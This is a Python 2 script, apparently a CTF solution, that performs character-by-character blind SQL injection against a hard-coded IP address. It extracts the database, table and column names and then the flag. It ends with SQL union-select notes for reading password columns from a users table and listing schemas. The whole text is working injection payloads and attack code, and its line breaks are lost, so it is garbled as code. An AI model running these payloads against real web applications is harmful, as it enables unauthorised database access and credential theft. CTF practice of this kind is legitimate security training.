url = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php' s = requests.session() str_all = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}_+-*/=" print string defdatabase(): data = '' payload = "?id=1'and if(lpad((select database()),{},1)in('{}'),1,0)-- -" for i in xrange(1,10): print i for c in str_all: payload_url = url + payload.format(i,data+c) res = s.get(payload_url) print payload_url if'hello'in res.text: data = data + c print data break
deftable(): data = '' payload = "?id=1'and if(lpad((select table_name from information_schema.tables where table_schema between 'ctf' and 'CTF' limit 1,1),{},1)in('{}'),1,0)-- -" for i in xrange(1,30): print i for c in str_all: payload_url = url + payload.format(i,data+c) res = s.get(payload_url) if'hello'in res.text: data = data + c print data break
defcolumn(): data = '' payload = "?id=1'and if(lpad((select column_name from information_schema.columns where table_name between 'fla49' and 'FLA49'),{},1)in('{}'),1,0)-- -" for i in xrange(1,10): print i for c in str_all: payload_url = url + payload.format(i,data+c) res = s.get(payload_url) if'hello'in res.text: data = data + c print data break
defget_flag(): data = '' payload = "?id=1'and if(lpad((select binary group_concat(flag) from fla49),{},1)in('{}'),1,0)-- -" for i in xrange(1,40): print i for c in str_all: payload_url = url + payload.format(i,data+c) res = s.get(payload_url) if'hello'in res.text: data = data + c print data break
select 1,2,3,4; select 1,2,3,4 union select * from users; select passwd from (select 1,2,3 as passwd, 4 union select * from users) as twoname; select twoname.passwd from (select 1,2,(3)passwd,4 union select * from think_user)twoname limit 1 offset 1; //查询字段 select data from (select 1,2,3,(4)data union select 1,2,3,schema_name from information_schema.schemata) as tt; //查询数据库